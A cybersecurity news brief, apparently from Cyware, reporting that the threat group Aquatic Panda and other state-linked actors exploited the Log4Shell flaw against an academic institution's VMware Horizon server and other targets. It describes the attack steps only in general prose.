A Chinese threat group, Aquatic Panda, is abusing the Log4j vulnerability to target large academic institutions. The group has gathered credentials for further exploitation.

Aquatic Panda abuses Log4Shell

According to CrowdStrike, Aquatic Panda has been active since May 2020 and is abusing Log4Shell (CVE-2021-44228).
  • Researchers observed some abnormal activities around a Tomcat server running on a vulnerable VMware Horizon instance operated by a renowned academic institution.
  • With help of actionable alerts, the security firm was able to timely discover the attack and mitigate it.

Attack details

The threat group is known for using tools for maintaining persistence to obtain access to intellectual property and other trade secrets.
  • In this specific attack, attackers were performing several connectivity checks via DNS lookups on a subdomain, running under the Apache Tomcat service hosted on a VMware Horizon instance.
  • Attackers then executed multiple Linux commands, attempting to run some curl and wget commands, as well as executing bash-shell with a hardcoded IP address.
  • The remote server used for these attacks was linked to Aquatic Panda.

The exploitation of Log4j continues

Mandiant and Microsoft have disclosed other Chinese as well as other threat groups abusing the Log4j vulnerability as well. 
  • Microsoft observed attacks from HAFNIUM, abusing the vulnerability against virtualization infrastructure, by using some DNS service usually associated with the testing activity to fingerprint systems. 
  • Additionally, Microsoft warned regarding attacks by threat groups linked to Iran, Turkey, and North Korea, all leveraging the Log4Shell vulnerability.

In the meantime, the U.S. FTC issued a warning to companies to proactively address the flaw in the Java logging utility Log4j. Else, it will legally pursue the non-compliant firms with full authority.

Ending notes

Log4j is part of tons of applications running on millions of systems across multiple industries, making the attack surface much wider than expected. Multiple government security agencies and private firms are already warning against the abuse of the vulnerabilities in Log4j. Moreover, organizations can follow Cyware’s approach of handling Log4j related issues.

Cyware Publisher